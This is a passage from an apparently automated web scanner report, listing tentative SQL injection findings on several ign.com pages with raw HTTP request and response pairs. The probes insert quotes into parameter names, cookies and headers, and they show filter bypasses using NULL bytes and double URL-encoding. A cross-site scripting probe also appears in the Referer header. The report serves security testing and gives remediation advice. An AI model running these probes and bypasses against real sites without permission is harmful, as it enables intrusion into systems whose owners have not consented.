GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=99945&FlightID=90834&TargetID=16207&EntityDefResetFlag=0&C=0&Segments=4,352,1240,2091,2094,2747,2861,3491,3978,4112,4602,4603,4723,4882,4917,4941,4952,4968,5025,5046,5052,5328,5718,5749,5906,6102,6382,6573,6616,6669,6700,6703,7102,7396,7752,7888,8587,9109,9598,10821,11754,13182,14845,15232,16249,16251,16339,17586,17863,17899,19173,19554,19557,20835,20860,20903,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6554,6851,8078,9129,6821,8525,9481,7677,24547,7478,6659,10619,13442,16207,22191,24028,24020&Values=25,31,43,60,72,80,91,101,110,150,152,235,264,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bmgrptj,bguRragewbmAq HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(1)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utmb=173446715.1.10.1297040497; rsi_segs=10089; decc=US; NGUserID=a016c09-19918-1173906965-3; i18n-cc=US; freq=c-1297040390930v-1n-12mc+1297040390930mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:29 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=99945&FlightID=90834&TargetID=16207&EntityDefResetFlag=0&C=0&Segments=4,352,1240,2091,2094,2747,2861,3491,3978,4112,4602,4603,4723,4882,4917,4941,4952,4968,5025,5046,5052,5328,5718,5749,5906,6102,6382,6573,6616,6669,6700,6703,7102,7396,7752,7888,8587,9109,9598,10821,11754,13182,14845,15232,16249,16251,16339,17586,17863,17899,19173,19554,19557,20835,20860,20903,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6554,6851,8078,9129,6821,8525,9481,7677,24547,7478,6659,10619,13442,16207,22191,24028,24020&Values=25,31,43,60,72,80,91,101,110,150,152,235,264,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bmgrptj,bguRragewbmAq HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(1)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utmb=173446715.1.10.1297040497; rsi_segs=10089; decc=US; NGUserID=a016c09-19918-1173906965-3; i18n-cc=US; freq=c-1297040390930v-1n-12mc+1297040390930mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:29 GMT
Connection: close
Vary: Accept-Encoding


1.48. http://faqs.ign.com/objects/143/14354229.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://faqs.ign.com
Path:   /objects/143/14354229.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /objects/143/14354229.html?1'=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:36 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c02-23694-1614185244-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:36 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043436610v-1n-12mc+1297043436610mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 117487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<SCRIPT LANGUAGE=VBScript\> \n');
document.write('on error resume next \n');
document.write('ShockMode = (IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash.10")))\n');
document.write('<\/SCRIPT\>
...[SNIP]...

Request 2

GET /objects/143/14354229.html?1''=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:38 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c02-24874-469892772-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:38 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043438046v-1n-12mc+1297043438046mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 111868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...

1.49. http://faqs.ign.com/objects/857/857126.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://faqs.ign.com
Path:   /objects/857/857126.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /objects/857/857126.html?1'=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:40 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15003-343287037-6;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:40 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043441009v-1n-12mc+1297043441009mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 120234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<SCRIPT LANGUAGE=VBScript\> \n');
document.write('on error resume next \n');
document.write('ShockMode = (IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash.10")))\n');
document.write('<\/SCRIPT\>
...[SNIP]...

Request 2

GET /objects/857/857126.html?1''=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:41 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-25644-613569988-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:41 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043441887v-1n-12mc+1297043441887mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 117185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...

1.50. http://movies.ign.com/index/podcasts.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://movies.ign.com
Path:   /index/podcasts.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /index/podcasts.html?1%00'=1 HTTP/1.1
Host: movies.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:54:09 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-2421-1244301562-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:54:09 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043649178v-1n-12mc+1297043649178mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 105560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Movies: Traile
...[SNIP]...
<a href="http://www.eyewonderlabs.com/ct.cfm?ewbust=0&guid=0&ewadid=133845&eid=1408638&file=http://cdn.eyewonder.com/100125/767313/1408638/NOSCRIPTfailover.jpg&pnl=MainBanner&type=0&name=Clickthru-NOSCRIPT&num=1&time=0&diff=0&clkX=&clkY=&click=http://ad.doubleclick.net/clk;233693403;57403001;s?http://mindjackgame.com/na/order.html" target="_blank">
...[SNIP]...

Request 2

GET /index/podcasts.html?1%00''=1 HTTP/1.1
Host: movies.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:54:09 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-26296-1816024641-6;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:54:09 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043649995v-1n-12mc+1297043649995mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 103146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Movies: Traile
...[SNIP]...

1.51. http://ps3.ign.com/ [MSCulture cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ps3.ign.com
Path:   /

Issue detail

The MSCulture cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MSCulture cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the MSCulture cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET / HTTP/1.1
Host: ps3.ign.com
Proxy-Connection: keep-alive
Referer: http://xbox360.ign.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==%2527; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; NGUserID=a016c06-15003-1306593845-5; decc=US; i18n-cc=US; freq=c-1297041089878v-1n-12mc+1297041089878mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; __utma=173446715.1624600188.1297040497.1297040497.1297041142.2; __utmb=173446715; __utmc=173446715; rsi_segs=10089; s_pers=%20s_nr%3D1297041144640%7C1299633144640%3B%20s_lv%3D1297041144641%7C1391649144641%3B%20s_lv_s%3DFirst%2520Visit%7C1297042944641%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dxbox360.ign.com%253A%3B%20s_c13%3Dxbox360.ign.com%253A%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Axbox360%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//ps3.ign.com/%252526ot%25253DA%3B

Response 1

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:15:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:15:52 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: freq=c-1297041089878v-2n-12mc+1297041089878mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 170026

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Sony PlayStation 3
...[SNIP]...
<a href="http://www.eyewonderlabs.com/ct.cfm?ewbust=0&guid=0&ewadid=122610&eid=1420207&file=http://cdn.eyewonder.com/100125/765638/1420207/NOSCRIPTfailover.gif&pnl=MainBanner&type=0&name=Clickthru-NOSCRIPT&num=1&time=0&diff=0&clkX=&clkY=&click=http://www.facebook.com/marvelvscapcom3?v=app_163719520308859" target="_blank">
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: ps3.ign.com
Proxy-Connection: keep-alive
Referer: http://xbox360.ign.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==%2527%2527; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; NGUserID=a016c06-15003-1306593845-5; decc=US; i18n-cc=US; freq=c-1297041089878v-1n-12mc+1297041089878mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; __utma=173446715.1624600188.1297040497.1297040497.1297041142.2; __utmb=173446715; __utmc=173446715; rsi_segs=10089; s_pers=%20s_nr%3D1297041144640%7C1299633144640%3B%20s_lv%3D1297041144641%7C1391649144641%3B%20s_lv_s%3DFirst%2520Visit%7C1297042944641%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dxbox360.ign.com%253A%3B%20s_c13%3Dxbox360.ign.com%253A%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Axbox360%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//ps3.ign.com/%252526ot%25253DA%3B

Response 2

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:15:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:15:53 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: freq=c-1297041089878v-2n-12mc+1297041089878mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 168603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Sony PlayStation 3
...[SNIP]...

1.52. http://ps3.ign.com/index/latest-updates.html [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ps3.ign.com
Path:   /index/latest-updates.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /index/latest-updates.html?types=all HTTP/1.1
Host: ps3.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:56:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:56:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15003-168970628-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:56:52 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043812413v-1n-12mc+1297043812413mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 142369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<SCRIPT LANGUAGE=VBScript\> \n');
document.write('on error resume next \n');
document.write('ShockMode = (IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash.10")))\n');
document.write('<\/SCRIPT\>
...[SNIP]...

Request 2

GET /index/latest-updates.html?types=all HTTP/1.1
Host: ps3.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:56:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:56:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-27586-1195048803-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:56:52 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043812820v-1n-12mc+1297043812820mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 137093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...

1.53. http://ps3.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ps3.ign.com
Path:   /index/latest-updates.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /index/latest-updates.html?1'=1 HTTP/1.1
Host: ps3.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:56:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:56:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c07-32464-475650399-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:56:23 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043783213v-1n-12mc+1297043783213mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 147849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<a href="http://www.eyewonderlabs.com/ct.cfm?ewbust=0&guid=0&ewadid=134339&eid=1409677&file=http://cdn.eyewonder.com/100125/766781/1409677/NOSCRIPTfailover.jpg&pnl=MainBanner&type=0&name=Clickthru-NOSCRIPT&num=1&time=0&diff=0&clkX=&clkY=&click=http://clk.redcated/IWC/go/277893011/direct/01/" target="_blank">
...[SNIP]...

Request 2

GET /index/latest-updates.html?1''=1 HTTP/1.1
Host: ps3.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:56:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:56:24 GMT
